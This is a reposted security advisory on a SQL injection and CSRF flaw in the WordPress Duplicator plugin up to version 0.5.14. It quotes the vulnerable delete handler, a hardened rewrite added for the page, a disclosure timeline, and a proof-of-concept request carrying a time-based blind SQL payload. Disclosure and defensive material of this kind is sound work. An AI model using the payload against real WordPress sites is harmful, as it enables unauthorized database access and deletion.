WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection
Posted by Guest on 31st August 2020 12:43:14 PM
######################

# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/

# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip

# Date : 2015-04-08

# Tested on : Linux / Mozilla Firefox

######################

# Description

 Wordpress Duplicator 0.5.14 suffers from a remote SQL Injection vulnerability.

 Location file: /view/actions.php

 This is the buggy ajax function wp_ajax_duplicator_package_delete:

 function duplicator_package_delete() {
     DUP_Util::CheckPermissions('export');
     try {
         global $wpdb;
         $json     = array();
         $post     = stripslashes_deep($_POST);
         $tblName  = $wpdb->prefix . 'duplicator_packages';
         $postIDs  = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
         $list     = explode(",", $postIDs);
         $delCount = 0;

         if ($postIDs != null) {
             foreach ($list as $id) {
                 // $id comes straight from the POST body and is interpolated into the SQL string
                 $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
                 if ($getResult) {
                     $row       = $getResult[0];
                     $nameHash  = "{$row['name']}_{$row['hash']}";
                     // the same unescaped $id reaches the DELETE statement
                     $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
                     if ($delResult != 0) {
                         // ... (remainder of the function not shown in the advisory)
                     }
                 }
             }
         }
     } catch (Exception $e) {
         // ... (not shown in the advisory)
     }
 }

 The $post['duplicator_delid'] variable is not sanitized before it is concatenated into the query.

 An authorized user with the "export" permission, or a remote unauthenticated attacker who entices an
 authenticated admin into issuing the request (CSRF), could use this vulnerability to execute arbitrary
 SQL queries on the victim WordPress web site.

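For comparison, a hardened rewrite of the handler quoted above. This is example code added for this page, not the vendor's actual fix; the nonce action name, the POST field `nonce`, and the `_hardened` hook/function names are assumptions.

```php
<?php
// Added example (not the vendor's patch): same structure as the vulnerable
// handler, but (1) a nonce check defeats the CSRF vector, (2) the capability
// is re-checked explicitly, (3) every ID is coerced to a positive integer
// before it reaches SQL, and (4) values are bound with $wpdb->prepare().
// The nonce action name 'duplicator_package_delete_nonce' is an assumption.
function duplicator_package_delete_hardened() {
    // CSRF: WordPress aborts unless $_POST['nonce'] was issued for this
    // action and this user's session, so a forged cross-site POST fails here.
    check_ajax_referer('duplicator_package_delete_nonce', 'nonce');

    if (!current_user_can('export')) {
        wp_send_json_error(array('error' => 'insufficient permissions'), 403);
    }

    global $wpdb;
    $tblName = $wpdb->prefix . 'duplicator_packages'; // derived from config, not user input

    // absint() keeps only the leading integer: "1 and (select ...)" becomes 1,
    // purely non-numeric input becomes 0 and is dropped by array_filter().
    $raw = isset($_POST['duplicator_delid']) ? wp_unslash($_POST['duplicator_delid']) : '';
    $ids = array_filter(array_map('absint', explode(',', (string) $raw)));

    $delCount = 0;
    foreach ($ids as $id) {
        // %d forces an integer cast at bind time, so the query shape is fixed
        // even if the filtering above were ever bypassed.
        $row = $wpdb->get_row(
            $wpdb->prepare("SELECT name, hash FROM `{$tblName}` WHERE id = %d", $id),
            ARRAY_A
        );
        if ($row === null) {
            continue;
        }
        $deleted = $wpdb->query(
            $wpdb->prepare("DELETE FROM `{$tblName}` WHERE id = %d", $id)
        );
        if ($deleted) {
            $delCount++;
        }
    }

    wp_send_json_success(array('removed' => $delCount));
}
// Hook name is an assumption for this example; the plugin's real hook is wp_ajax_duplicator_package_delete.
add_action('wp_ajax_duplicator_package_delete_hardened', 'duplicator_package_delete_hardened');
```

With this version the PoC body below is reduced to the single integer 1, and the request is rejected outright when no valid nonce accompanies it.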
######################

# PoC

 http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete

 POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)

######################

# Vulnerability Disclosure Timeline:

2015-04-08:  Discovered vulnerability
2015-04-08:  Vendor Notification
2015-04-09:  Vendor Response/Feedback
2015-04-10:  Vendor Send Fix/Patch
2015-04-10:  Public Disclosure

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)

                [email protected]
                [email protected]

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
